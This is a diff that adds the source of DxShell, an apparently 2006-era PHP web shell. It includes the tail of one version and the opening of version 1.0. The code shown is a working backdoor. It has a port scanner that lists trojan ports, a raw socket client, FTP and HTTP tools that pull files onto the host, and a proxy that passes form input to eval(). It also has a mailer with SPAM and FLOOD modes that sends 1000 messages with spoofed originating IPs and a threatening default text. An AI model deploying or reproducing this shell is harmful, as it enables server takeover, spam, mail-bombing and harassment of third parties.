+		$DEF_PORTS=array (1=>'tcpmux (TCP Port Service Multiplexer)',2=>'Management Utility',3=>'Compression Process',5=>'rje (Remote Job Entry)',7=>'echo',9=>'discard',11=>'systat',13=>'daytime',15=>'netstat',17=>'quote of the day',18=>'send/rwp',19=>'character generator',20=>'ftp-data',21=>'ftp',22=>'ssh, pcAnywhere',23=>'Telnet',25=>'SMTP (Simple Mail Transfer)',27=>'ETRN (NSW User System FE)',29=>'MSG ICP',31=>'MSG Authentication',33=>'dsp (Display Support Protocol)',37=>'time',38=>'RAP (Route Access Protocol)',39=>'rlp (Resource Location Protocol)',41=>'Graphics',42=>'nameserv, WINS',43=>'whois, nickname',44=>'MPM FLAGS Protocol',45=>'Message Processing Module [recv]',46=>'MPM [default send]',47=>'NI FTP',48=>'Digital Audit Daemon',49=>'TACACS, Login Host Protocol',50=>'RMCP, re-mail-ck',53=>'DNS',57=>'MTP (any private terminal access)',59=>'NFILE',60=>'Unassigned',61=>'NI MAIL',62=>'ACA Services',63=>'whois++',64=>'Communications Integrator (CI)',65=>'TACACS-Database Service',66=>'Oracle SQL*NET',67=>'bootps (Bootstrap Protocol Server)',68=>'bootpd/dhcp (Bootstrap Protocol Client)',69=>'Trivial File Transfer Protocol (tftp)',70=>'Gopher',71=>'Remote Job Service',72=>'Remote Job Service',73=>'Remote Job Service',74=>'Remote Job Service',75=>'any private dial out service',76=>'Distributed External Object Store',77=>'any private RJE service',78=>'vettcp',79=>'finger',80=>'World Wide Web HTTP',81=>'HOSTS2 Name Serve',82=>'XFER Utility',83=>'MIT ML Device',84=>'Common Trace Facility',85=>'MIT ML Device',86=>'Micro Focus Cobol',87=>'any private terminal link',88=>'Kerberos, WWW',89=>'SU/MIT Telnet Gateway',90=>'DNSIX Securit Attribute Token Map',91=>'MIT Dover Spooler',92=>'Network Printing Protocol',93=>'Device Control Protocol',94=>'Tivoli Object Dispatcher',95=>'supdup',96=>'DIXIE',98=>'linuxconf',99=>'Metagram Relay',100=>'[unauthorized use]',101=>'HOSTNAME',102=>'ISO, X.400, ITOT',103=>'Genesis Point-to&#14144;&#429;oi&#65535;&#65535; T&#0;&#0;ns&#0;&#0;et',104=>'ACR-NEMA Digital Imag. & Comm. 300',105=>'CCSO name server protocol',106=>'poppassd',107=>'Remote Telnet Service',108=>'SNA Gateway Access Server',109=>'POP2',110=>'POP3',111=>'Sun RPC Portmapper',112=>'McIDAS Data Transmission Protocol',113=>'Authentication Service',115=>'sftp (Simple File Transfer Protocol)',116=>'ANSA REX Notify',117=>'UUCP Path Service',118=>'SQL Services',119=>'NNTP',120=>'CFDP',123=>'NTP',124=>'SecureID',129=>'PWDGEN',133=>'statsrv',135=>'loc-srv/epmap',137=>'netbios-ns',138=>'netbios-dgm (UDP)',139=>'NetBIOS',143=>'IMAP',144=>'NewS',150=>'SQL-NET',152=>'BFTP',153=>'SGMP',156=>'SQL Service',161=>'SNMP',175=>'vmnet',177=>'XDMCP',178=>'NextStep Window Server',179=>'BGP',180=>'SLmail admin',199=>'smux',210=>'Z39.50',213=>'IPX',218=>'MPP',220=>'IMAP3',256=>'RAP',257=>'Secure Electronic Transaction',258=>'Yak Winsock Personal Chat',259=>'ESRO',264=>'FW1_topo',311=>'Apple WebAdmin',350=>'MATIP type A',351=>'MATIP type B',363=>'RSVP tunnel',366=>'ODMR (On-Demand Mail Relay)',371=>'Clearcase',387=>'AURP (AppleTalk Update-Based Routing Protocol)',389=>'LDAP',407=>'Timbuktu',427=>'Server Location',434=>'Mobile IP',443=>'ssl',444=>'snpp, Simple Network Paging Protocol',445=>'SMB',458=>'QuickTime TV/Conferencing',468=>'Photuris',475=>'tcpnethaspsrv',500=>'ISAKMP, pluto',511=>'mynet-as',512=>'biff, rexec',513=>'who, rlogin',514=>'syslog, rsh',515=>'lp, lpr, line printer',517=>'talk',520=>'RIP (Routing Information Protocol)',521=>'RIPng',522=>'ULS',531=>'IRC',543=>'KLogin, AppleShare over IP',545=>'QuickTime',548=>'AFP',554=>'Real Time Streaming Protocol',555=>'phAse Zero',563=>'NNTP over SSL',575=>'VEMMI',581=>'Bundle Discovery Protocol',593=>'MS-RPC',608=>'SIFT/UFT',626=>'Apple ASIA',631=>'IPP (Internet Printing Protocol)',635=>'RLZ DBase',636=>'sldap',642=>'EMSD',648=>'RRP (NSI Registry Registrar Protocol)',655=>'tinc',660=>'Apple MacOS Server Admin',666=>'Doom',674=>'ACAP',687=>'AppleShare IP Registry',700=>'buddyphone',705=>'AgentX for SNMP',901=>'swat, realsecure',993=>'s-imap',995=>'s-pop',1024=>'Reserved',1025=>'network blackjack',1062=>'Veracity',1080=>'SOCKS',1085=>'WebObjects',1227=>'DNS2Go',1243=>'SubSeven',1338=>'Millennium Worm',1352=>'Lotus Notes',1381=>'Apple Network License Manager',1417=>'Timbuktu Service 1 Port',1418=>'Timbuktu Service 2 Port',1419=>'Timbuktu Service 3 Port',1420=>'Timbuktu Service 4 Port',1433=>'Microsoft SQL Server',1434=>'Microsoft SQL Monitor',1477=>'ms-sna-server',1478=>'ms-sna-base',1490=>'insitu-conf',1494=>'Citrix ICA Protocol',1498=>'Watcom-SQL',1500=>'VLSI License Manager',1503=>'T.120',1521=>'Oracle SQL',1522=>'Ricardo North America License Manager',1524=>'ingres',1525=>'prospero',1526=>'prospero',1527=>'tlisrv',1529=>'oracle',1547=>'laplink',1604=>'Citrix ICA, MS Terminal Server',1645=>'RADIUS Authentication',1646=>'RADIUS Accounting',1680=>'Carbon Copy',1701=>'L2TP/LSF',1717=>'Convoy',1720=>'H.323/Q.931',1723=>'PPTP control port',1731=>'MSICCP',1755=>'Windows Media .asf',1758=>'TFTP multicast',1761=>'cft-0',1762=>'cft-1',1763=>'cft-2',1764=>'cft-3',1765=>'cft-4',1766=>'cft-5',1767=>'cft-6',1808=>'Oracle-VP2',1812=>'RADIUS server',1813=>'RADIUS accounting',1818=>'ETFTP',1973=>'DLSw DCAP/DRAP',1985=>'HSRP',1999=>'Cisco AUTH',2001=>'glimpse',2049=>'NFS',2064=>'distributed.net',2065=>'DLSw',2066=>'DLSw',2106=>'MZAP',2140=>'DeepThroat',2301=>'Compaq Insight Management Web Agents',2327=>'Netscape Conference',2336=>'Apple UG Control',2427=>'MGCP gateway',2504=>'WLBS',2535=>'MADCAP',2543=>'sip',2592=>'netrek',2727=>'MGCP call agent',2628=>'DICT',2998=>'ISS Real Secure Console Service Port',3000=>'Firstclass',3001=>'Redwood Broker',3031=>'Apple AgentVU',3128=>'squid',3130=>'ICP',3150=>'DeepThroat',3264=>'ccmail',3283=>'Apple NetAssitant',3288=>'COPS',3305=>'ODETTE',3306=>'mySQL',3389=>'RDP Protocol (Terminal Server)',3521=>'netrek',4000=>'icq, command-n-conquer and shell nfm',4321=>'rwhois',4333=>'mSQL',4444=>'KRB524',4827=>'HTCP',5002=>'radio free ethernet',5004=>'RTP',5005=>'RTP',5010=>'Yahoo! Messenger',5050=>'multimedia conference control tool',5060=>'SIP',5150=>'Ascend Tunnel Management Protocol',5190=>'AIM',5500=>'securid',5501=>'securidprop',5423=>'Apple VirtualUser',5555=>'Personal Agent',5631=>'PCAnywhere data',5632=>'PCAnywhere',5678=>'Remote Replication Agent Connection',5800=>'VNC',5801=>'VNC',5900=>'VNC',5901=>'VNC',6000=>'X Windows',6112=>'BattleNet',6502=>'Netscape Conference',6667=>'IRC',6670=>'VocalTec Internet Phone, DeepThroat',6699=>'napster',6776=>'Sub7',6970=>'RTP',7007=>'MSBD, Windows Media encoder',7070=>'RealServer/QuickTime',7777=>'cbt',7778=>'Unreal',7648=>'CU-SeeMe',7649=>'CU-SeeMe',8000=>'iRDMI/Shoutcast Server',8010=>'WinGate 2.1',8080=>'HTTP',8181=>'HTTP',8383=>'IMail WWW',8875=>'napster',8888=>'napster',8889=>'Desktop Data TCP 1',8890=>'Desktop Data TCP 2',8891=>'Desktop Data TCP 3: NESS application',8892=>'Desktop Data TCP 4: FARM product',8893=>'Desktop Data TCP 5: NewsEDGE/Web application',8894=>'Desktop Data TCP 6: COAL application',9000=>'CSlistener',10008=>'cheese worm',11371=>'PGP 5 Keyserver',13223=>'PowWow',13224=>'PowWow',14237=>'Palm',14238=>'Palm',18888=>'LiquidAudio',21157=>'Activision',22555=>'Vocaltec Web Conference',23213=>'PowWow',23214=>'PowWow',23456=>'EvilFTP',26000=>'Quake',27001=>'QuakeWorld',27010=>'Half-Life',27015=>'Half-Life',27960=>'QuakeIII',30029=>'AOL Admin',31337=>'Back Orifice',32777=>'rpc.walld',45000=>'Cisco NetRanger postofficed',32773=>'rpc bserverd',32776=>'rpc.spray',32779=>'rpc.cmsd',38036=>'timestep',40193=>'Novell',41524=>'arcserve discovery',);
+
+	if (isset($_GET['dxparam']))
+		{
		print "\n".'<table><tr><td class=listing colspan=2><h2>#Scan main will scan these '.count($DEF_PORTS).' ports:</td></tr>';
+		$INDEXES=array_keys($DEF_PORTS);
+		for ($i=0;$i<count($INDEXES);$i++)
+			print "\n".'<tr><td width=40 class=listing style="text-align:right;">'.$INDEXES[$i].'</td><td class=listing>'.$DEF_PORTS[ $INDEXES[$i] ].'</td></tr>';
+		print "\n".'</table>';
+		die();
+		}
+
+	if (isset($_POST['dxportscan']))
+		{
		$OKAY_PORTS = 0;
+		$TOSCAN=array();
+
+		if ($_POST['dxportscan']['ports']=='#default') $TOSCAN=array_keys($DEF_PORTS);
+			else
+			{
			$_POST['dxportscan']['ports']=explode(',',$_POST['dxportscan']['ports']);
+			for ($i=0;$i<count($_POST['dxportscan']['ports']);$i++)
+				{
				$_POST['dxportscan']['ports'][$i]=explode('-',$_POST['dxportscan']['ports'][$i]);
+				if (count($_POST['dxportscan']['ports'][$i])==1) $TOSCAN[]=$_POST['dxportscan']['ports'][$i][0];
+					else
+					$TOSCAN+=range($_POST['dxportscan']['ports'][$i][0], $_POST['dxportscan']['ports'][$i][1]);
+				$_POST['dxportscan']['ports'][$i]=implode('-', $_POST['dxportscan']['ports'][$i]);
+				}
+			$_POST['dxportscan']['ports']=implode(',',$_POST['dxportscan']['ports']);
+			}
+
+		print "\n".'<table><tr><td colspan=2><font class="highlight_txt">Opened ports:</td></tr>';
+		list($usec, $sec) = explode(' ', microtime());
+		$start=(float)$usec + (float)$sec;
+		for ($i=0;$i<count($TOSCAN);$i++)
+			{
			$cur_port=&$TOSCAN[$i];
+			$fp=@fsockopen($_POST['dxportscan']['host'], $cur_port, $e, $e, (float)$_POST['dxportscan']['timeout']);
+			if ($fp)
+				{
				$OKAY_PORTS++;
+				$port_name='';
+				if (isset($DEF_PORTS[$cur_port])) $port_name=$DEF_PORTS[$cur_port];
+				print "\n".'<tr><td width=50 class=listing style="text-align:right;">'.$cur_port.'</td><td class=listing>'.$port_name.'</td><td class=listing>'.getservbyport($cur_port, 'tcp').'</td></tr>';
+				}
+			}
+		list($usec, $sec) = explode(' ', microtime());
+		$end=(float)$usec + (float)$sec;
+
+		print "\n".'</table>';
+		print "\n".'<font class="highlight_txt">Scanned '.count($TOSCAN).', '.$OKAY_PORTS.' opened. Time: '.($end-$start).'</font>';
+		print "\n".'<br><hr>'."\n";
+		}
+
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table border=0>'
+		.'<tr>'
+			.'<td colspan=2>'
+			.'<input type=text name="dxportscan[host]" value="'.((isset($_POST['dxportscan']['host']))?$_POST['dxportscan']['host'].'"':'127.0.0.1"').' SIZE=30>'
+			.'<input type=text name="dxportscan[timeout]" value="'.((isset($_POST['dxportscan']['timeout']))?$_POST['dxportscan']['timeout'].'"':'0.1"').' SIZE=10>'
+		.'</tr><tr>'
+			.'<td><textarea name="dxportscan[ports]" rows=3 cols=50>'.((isset($_POST['dxportscan']['ports']))?$_POST['dxportscan']['ports']:'21-25,35,80,3306').'</textarea>'
+			.'</td><td>'
+				.'<input type=checkbox name="dxportscan[ports]" value="#default"><a '.DxDesign_DrawBubbleBox('', 'To learn out what "main ports" are, click here', 300).' href="'.DxURL('kill','dxparam').'&dxparam=main_legend">#Scan main</a>'
+				.'<br><input type=submit value="Scan" class="submit" style="width:100pt;">'
+		.'</tr></table></form>';
+	}
+
+########
+########   Raw s0cket
+########
+if ($_GET['dxmode']=='SOCK')
+	{
+	$DEFQUERY=DxHTTPMakeHeaders('GET', '/index.php?get=q&get2=d', 'www.microsoft.com', 'DxS Browser', 'http://referer.com/', array('post_val' => 'Yeap'), array('cookiename' => 'val'));
+	print "\n".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=linelisting colspan=2 width=100%><input type=text name="dxsock_host" value="'.( (isset($_POST['dxsock_host'])?$_POST['dxsock_host']:'www.microsoft.com') ).'" style="width:100%;">';
+	print "\n".'</td><td class=linelisting><nobr><input type=text name="dxsock_port" value="'.( (isset($_POST['dxsock_port'])?$_POST['dxsock_port']:'80') ).'" SIZE=10>'
+			.' timeout <input type=text name="dxsock_timeout" value="'.( (isset($_POST['dxsock_timeout'])?$_POST['dxsock_timeout']:'1.0') ).'" SIZE=4></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=3>'
+			.'<textarea ROWS=15 name="dxsock_request" style="width:100%;">'.( (isset($_POST['dxsock_request'])?$_POST['dxsock_request']:$DEFQUERY) ).'</textarea>'
+			.'</td></tr>';
+	print "\n".'<tr>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="HTML" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='HTML')?'CHECKED':'')	:'CHECKED') ).'>HTML</td>'
+		.'<td class=linelisting width=50pt><input type=radio name="dxsock_type" value="TEXT" '.( (isset($_POST['dxsock_type'])?	(($_POST['dxsock_type']=='TEXT')?'CHECKED':'') :'') ).'>TEXT</td>'
+		.'<td class=linelisting width=100%><div align=right><input type=submit class=submit value="Send" style="width:100pt;height:20pt;"></td>'
+		.'</tr>';
+	print "\n".'</table>';
+
+	if (!isset($_POST['dxsock_host'], $_POST['dxsock_port'], $_POST['dxsock_timeout'], $_POST['dxsock_request'], $_POST['dxsock_type'])) die();
+
+	print "\n".'<table width=100% cellspacing=0 celpadding=0>';
+	print "\n".'<tr><td class=listing><pre><font class=highlight_txt>'.$_POST['dxsock_request'].'</font></pre></td></tr>';
+	print "\n\n\n".'<tr><td class=listing>';
+
+	$fp=@fsockopen($_POST['dxsock_host'], $_POST['dxsock_port'], $errno, $errstr, (float)$_POST['dxsock_timeout']);
+	if (!$fp) die(DxError('Sock #'.$errno.' : '.$errstr));
+
+	if ($_POST['dxsock_type']=='TEXT') print '<plaintext>';
+
+	if (!empty($_POST['dxsock_request']))	fputs($fp, $_POST['dxsock_request']);
+	$ret='';
+	while (!feof($fp)) $ret.=fgets($fp, 4096 );
+	fclose( $fp );
+
+	if ($_POST['dxsock_type']=='HTML') $headers_over_place=strpos($ret,"\r\n\r\n"); else $headers_over_place=FALSE;
+
+	if ($headers_over_place===FALSE)	print $ret;
+		else print '<pre>'.substr($ret, 0, $headers_over_place).'</pre><br><hr><br>'.substr($ret, $headers_over_place);
+
+	if ($_POST['dxsock_type']=='HTML') print "\n".'</td></tr></table>';
+	}
+
+########
+########   FTP, HTTP file transfers
+########
+if ($_GET['dxmode']=='FTP')
+	{
	print "\n".'<table align=center width=100%><col span=3 align=right width=33%><tr><td align=center><font class="highlight_txt"><b>HTTP Download</td><td align=center><font class="highlight_txt"><b>FTP Download</td><td align=center><font class="highlight_txt"><b>FTP Upload</td></tr>';
+
+	print "\n".'<tr><td>'; /* HTTP GET */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_HTTP" value="http://" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt" style="width:100%;">';
+	print "\n\t".'<input type=submit value="GET!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP DOWNL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="get.txt" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_DWN" value="Download!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td><td>'; /* FTP UPL */
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n\t".'<input type=text name="DxFTP_FTP" value="ftp.host.com[:21]" style="width:100%;">';
+	print "\n\t".'<nobr><b>Login:<input type=text name="DxFTP_USER" value="Anonymous" style="width:40%;"> / <input type=text name="DxFTP_PASS" value="" style="width:40%;"></b></nobr>';
+	print "\n\t".'<input type=text name="DxFTP_FileOF" value="'.((isset($_GET['dxdir'])?$_GET['dxdir']:DxFileOkaySlashes(realpath($GLOB['FILES']['CurDIR'])))).'/file.txt'.'" style="width:100%;">';
+	print "\n\t".'<input type=text name="DxFTP_FileTO" value="put.txt" style="width:100%;">';
+	print "\n\t".'<br><nobr><input type=checkbox name="DxFTP_File_BINARY" value="YES">Enable binary mode</nobr>';
+	print "\n\t".'<input type=submit name="DxFTP_UPL" value="Upload!" style="width:150pt;" class=submit></form>';
+	print "\n".'</td></tr></table>';
+
+	if (isset($_POST['DxFTP_HTTP']))
		{
		$URLPARSED=parse_url($_POST['DxFTP_HTTP']);
		$request=DxHTTPMakeHeaders('GET', $URLPARSED['path'].'?'.$URLPARSED['query'], $URLPARSED['host']);
+		if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10))) die(DxError('Sock #'.$errno.' : '.$errstr));
+		fputs($f, $request);
+
+		$GETFILE='';
+		while (!feof($f)) $GETFILE.=fgets($f, 4096 );
+		fclose( $f );
+
+		DxFiles_UploadHere($_POST['DxFTP_FileTO'], '', $GETFILE);
+		}
+
+	if (isset($_POST['DxFTP_DWN']) OR isset($_POST['DxFTP_UPL']))
+		{
		$DxFTP_SERV=explode(':',$_POST['DxFTP_FTP']);
+		if(empty($DxFTP_SERV[1])) {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = 21;} else {$DxFTP_SERV=$DxFTP_SERV[0]; $DxFTP_PORT = (int)$DxFTP_SERV[1];}
+		if (!($FTP=ftp_connect($DxFTP_SERV,$DxFTP_PORT,10))) die(DxError('No connection'));
+		if (!ftp_login($FTP, $_POST['DxFTP_USER'], $_POST['DxFTP_PASS'])) die(DxError('Login failed'));
+		if (isset($_POST['DxFTP_UPL']))
+			if (!ftp_put($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to upload'));  else print 'Upload OK';
+		if (isset($_POST['DxFTP_DWN']))
+			if (!ftp_get($FTP, $_POST['DxFTP_FileTO'],$_POST['DxFTP_FileOF'], (isset($_POST['DxFTP_File_BINARY']))?FTP_BINARY:FTP_ASCII))
+				die(DxError('Failed to download')); else print 'Download OK';
+		ftp_close($FTP);
+		}
+	}
+
+########
+########   HTTP Proxy
+########
+if ($_GET['dxmode']=='PROX')
+	{
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
	print "\n".'<table width=100% cellspacing=0>';
+	print "\n".'<tr><td width=100pt class=linelisting>URL</td><td><input type=text name="DxProx_Url" value="'.(isset($_POST['DxProx_Url'])?$_POST['DxProx_Url']:'http://www.microsoft.com:80/index.php?get=q&get2=d').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt colspan=2 class=linelisting><nobr>Browser <input type=text name="DxProx_Brw" value="'.(isset($_POST['DxProx_Brw'])?$_POST['DxProx_Brw']:'DxS Browser').'" style="width:40%;">'
+				.' Referer <input type=text name="DxProx_Ref" value="'.(isset($_POST['DxProx_Ref'])?$_POST['DxProx_Ref']:'http://www.ref.ru/').'" style="width:40%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>POST (php eval)</td><td><input type=text name="DxProx_PST" value="'.(isset($_POST['DxProx_PST'])?$_POST['DxProx_PST']:'array(\'post_val\' => \'Yeap\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td width=100pt class=linelisting><nobr>COOKIES (php eval)</td><td><input type=text name="DxProx_CKI" value="'.(isset($_POST['DxProx_CKI'])?$_POST['DxProx_CKI']:'array(\'cookiename\' => \'val\')').'" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td colspan=2><input type=submit value="Go" class=submit style="width:100%;">';
+	print "\n".'</td></tr></table></form>';
+
+	if (!isset($_POST['DxProx_Url'])) die();
+
+	print str_repeat("\n", 10).'<!-- DxS Proxy Browser -->'."\n\n";
+
+	if (empty($_POST['DxProx_PST'])) $_POST['DxProx_PST']=array();
+		else {if (eval('$_POST[\'DxProx_PST\']='.$_POST['DxProx_PST'].';')===FALSE) $_POST['DxProx_PST']=array();}
+	if (empty($_POST['DxProx_CKI'])) $_POST['DxProx_CKI']=array();
+		else {if (eval('$_POST[\'DxProx_CKI\']='.$_POST['DxProx_CKI'].';')===FALSE) $_POST['DxProx_CKI']=array();}
+
+	$URLPARSED=parse_url($_POST['DxProx_Url']);
+	$request=DxHTTPMakeHeaders('GET', (empty($URLPARSED['path'])?'/':$URLPARSED['path']).(!empty($URLPARSED['query'])?'?'.$URLPARSED['query']:''), $URLPARSED['host'], $_POST['DxProx_Brw'], $_POST['DxProx_Ref'], $_POST['DxProx_PST'], $_POST['DxProx_CKI']);
+	if (!($f=@fsockopen($URLPARSED['host'], (empty($URLPARSED['port']))?80:$URLPARSED['port'], $errno, $errstr, 10)))
+		die(DxError('Sock #'.$errno.' : '.$errstr));
+	fputs($f, $request);
+
+	$RET='';
+	while (!feof($f)) $RET.=fgets($f, 4096 );
+	fclose( $f );
+
+	print "\n".'<table width=100% border=0><tr><td>';
+	$headers_over_place=strpos($RET,"\r\n\r\n");
+	if ($headers_over_place===FALSE)	print $RET;
+		else
+		print '<pre><font class=highlight_txt>'.substr($RET, 0, $headers_over_place).'</font></pre><br><hr><br>'.substr($RET, $headers_over_place);
+	print str_repeat("\n", 10).'</td></tr></table>';
+	}
+
+########
+########   MAIL
+########
+if ($_GET['dxmode']=='MAIL')
+	{
	if (!isset($_GET['dxparam']))
+		{
+		print '';
		print "\n".'<form action="'.DxURL('kill', '').'" method=GET style="display:inline;">';
+		DxGETinForm('leave', '');
+		print "\n".'<input type=submit name="dxparam" value="SPAM" style="position: absolute; width: 30%; left: 10%;">'
+			.'<font class=highlight_txt style="position:absolute;left:46.5%;">: MAIL mode :</font>'
+			.'<input type=submit name="dxparam" value="FLOOD" style="position: absolute; width: 30%; right: 10%;">';
+		print "\n".'</form>';
+		die();}
+
+	if (ini_get('sendmail_path')=='') DxWarning('php.ini "sendmail_path" is empty! ('.var_export(ini_get('sendmail_path'), true).')');
+	print "\n\t".'<form action="'.DxURL('leave', '').'" method=POST>';
+	print "\n".'<table width=100% cellspacing=0 width=90% align=center><col width=100pt>';
+	if ($_GET['dxparam']=='FLOOD')
+		{
		print "\n".'<tr><td class=linelisting><b>TO: </td><td><input type=text name="DxMailer_TO" style="width:100%;" value="'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru':$_POST['DxMailer_TO']  ).'"></td></tr>';
+		print "\n".'<tr><td class=linelisting><b>NUM FLOOD: </td><td><input type=text name="DxMailer_NUM" value="'.(  (empty($_POST['DxMailer_NUM']))?'1000':$_POST['DxMailer_NUM']  ).'" SIZE=10></td></tr>';
+		}
+		else
		print "\n".'<tr><td class=linelisting><b>TO: </td><td><textarea name="DxMailer_TO" rows=10 style="width:100%;">'.(  (empty($_POST['DxMailer_TO']))?'tristam@mail.ru'."\n".'billy@microsoft.com':$_POST['DxMailer_TO']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>FROM: </td><td><input type=text name="DxMailer_FROM" value="'.(  (empty($_POST['DxMailer_FROM']))?'DxS <admin@'.$_SERVER['HTTP_HOST']:$_POST['DxMailer_FROM']  ).'>" style="width:100%;"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>SUBJ: </td><td><input type=text name="DxMailer_SUBJ" style="width:100%;" value="'.(  (empty($_POST['DxMailer_SUBJ']))?'Look here, man...':$_POST['DxMailer_SUBJ']  ).'"></td></tr>';
+	print "\n".'<tr><td class=linelisting><b>MSG: </td><td><textarea name="DxMailer_MSG" rows=5 style="width:100%;">'.(  (empty($_POST['DxMailer_MSG']))?'<html><body><b>Wanna be butchered?':$_POST['DxMailer_MSG']  ).'</textarea></td></tr>';
+	print "\n".'<tr><td class=linelisting colspan=2><div align=center><input type=submit Value="'.$_GET['dxparam'].'" class=submit style="width:70%;"></tr>';
+	print "\n".'</td></table></form>';
+
+	if (!isset($_POST['DxMailer_TO'])) die();
+
+	$HEADERS='';
+	$HEADERS.= 'MIME-Version: 1.0'."\r\n";
+	$HEADERS.= 'Content-type: text/html;'."\r\n";
+	$HEADERS.='To: %%TO%%'."\r\n";
+	$HEADERS.='From: '.$_POST['DxMailer_FROM']."\r\n";
+	$HEADERS.='X-Originating-IP: [%%IP%%]'."\r\n";
+	$HEADERS.='X-Mailer: DxS v'.$GLOB['SHELL']['Ver'].' Mailer'."\r\n";
+	$HEADERS.='Message-Id: <%%ID%%>';
+
+	if ($_GET['dxparam']=='FLOOD')
+		{
		$NUM=$_POST['DxMailer_NUM'];
+		$MAILS=array($_POST['DxMailer_TO']);
+		}
+		else
+		{
		$MAILS=explode("\n",str_replace("\r", '', $_POST['DxMailer_TO']));
+		$NUM=1;
+		}
+
+	function DxMail($t, $s, $m, $h)   /* debugger */
+	{print "\n\n\n<br><br><br>".$t."\n<br>".$s."\n<br>".$m."\n<br>".$h;}
+
+	$RESULTS[]=array();
+
+	for ($n=0;$n<$NUM;$n++)
+	for ($m=0;$m<count($MAILS);$m++)
		$RESULTS[]=(int)
+		mail($MAILS[$m], $_POST['DxMailer_SUBJ'], $_POST['DxMailer_MSG'],
+			str_replace(array('%%TO%%','%%IP%%', '%%ID%%'),
+						array('<'.$MAILS[$m].'>'  ,  long2ip(mt_rand(0,pow(2,31)))  ,  md5($n.$m.DxRandomChars(3).time())),
+						$HEADERS)
+			);
+
+	print "\n\n".'<br><br>'.array_sum($RESULTS).' mails sent ('.(		(100*array_sum($RESULTS))/($NUM*(count($MAILS)))		).'% okay)';
+
+	}
+
+if ($DXGLOBALSHIT) print "\n\n\n".'<!--/SHIT KILLER--></TD></TR></TABLE>';
+die();
+?>
+
diff --git a/php/DxShell.1.0.php b/php/DxShell.1.0.php
new file mode 100644
index 0000000..18abb6b
--- /dev/null
+++ b/php/DxShell.1.0.php
@@ -0,0 +1,2111 @@
+<?php
+$GLOB['SHELL']['USER']['Login']='';
+$GLOB['SHELL']['USER']['Passw']=''; /* pwd. "as is", or md5() possible */
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ# 1227-700
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
